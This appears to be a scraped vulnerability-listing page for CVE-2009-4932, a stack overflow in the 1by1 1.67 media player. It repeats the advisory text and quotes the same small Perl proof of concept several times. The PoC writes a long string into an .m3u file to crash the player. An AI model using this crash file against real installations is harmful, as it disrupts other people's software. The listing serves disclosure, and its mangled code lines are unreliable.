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EUVD-2009-4894
Malware in sbrugna...
CVE-2009-4932
Stack-based buffer overflow in 1by1 1.67 aka 1.6.7.0 allows remote attackers to cause a denial of service application crash or possibly execute arbitrary code via a long string in a .m3u playlist file...
Stack overflow
Stack-based buffer overflow in 1by1 1.67 aka 1.6.7.0 allows remote attackers to cause a denial of service application crash or possibly execute arbitrary code via a long string in a .m3u playlist file...
CVE-2009-4932
CVE-2009-4932 corresponds to a stack-based buffer overflow in the 1by1 player (version 1.67 / 1.6.7.0) triggered by a long string in an .m3u playlist file. The vulnerability allows remote attackers to cause an application crash (denial of service) and potentially execute arbitrary code on affecte...
CVE-2009-4932
Stack-based buffer overflow in 1by1 1.67 aka 1.6.7.0 allows remote attackers to cause a denial of service application crash or possibly execute arbitrary code via a long string in a .m3u playlist file...
1by1 1.67 (.m3u File) Local Stack Overflow PoC
No description provided by source. 1by1 1.67 .M3U File Local Stack Overflow POC my $chars= "A" x 4104; my $file="goldm.m3u"; openmy $FILE, "$file" or die "Cannot open $file: $!"; print $FILE $chars; close$FILE; print "$file has been created \n"; print "Thanx Tryag.Com";...
1by1 1.67 - .m3u Local Stack Overflow (PoC)
1by1 1.67 - .m3u Local Stack Overflow PoC 1by1 1.67 .M3U File Local Stack Overflow POC my $chars= "A" x 4104; my $file="goldm.m3u"; openmy $FILE, "$file" or die "Cannot open $file: $!"; print $FILE $chars; close$FILE; print "$file has been created \n"; print "Thanx Tryag.Com"; milw0rm.com 2009-04...
1by1 1.67 Stack Overflow
1by1 1.67 .M3U File Local Stack Overflow POC my $chars= "A" x 4104; my $file="goldm.m3u"; openmy $FILE, "$file" or die "Cannot open $file: $!"; print $FILE $chars; close$FILE; print "$file has been created \n"; print "Thanx Tryag.Com";...
1by1 1.67 - '.m3u' Local Stack Overflow (PoC)
1by1 1.67 .M3U File Local Stack Overflow POC my $chars= "A" x 4104; my $file="goldm.m3u"; openmy $FILE, "$file" or die "Cannot open $file: $!"; print $FILE $chars; close$FILE; print "$file has been created \n"; print "Thanx Tryag.Com"; milw0rm.com 2009-04-20...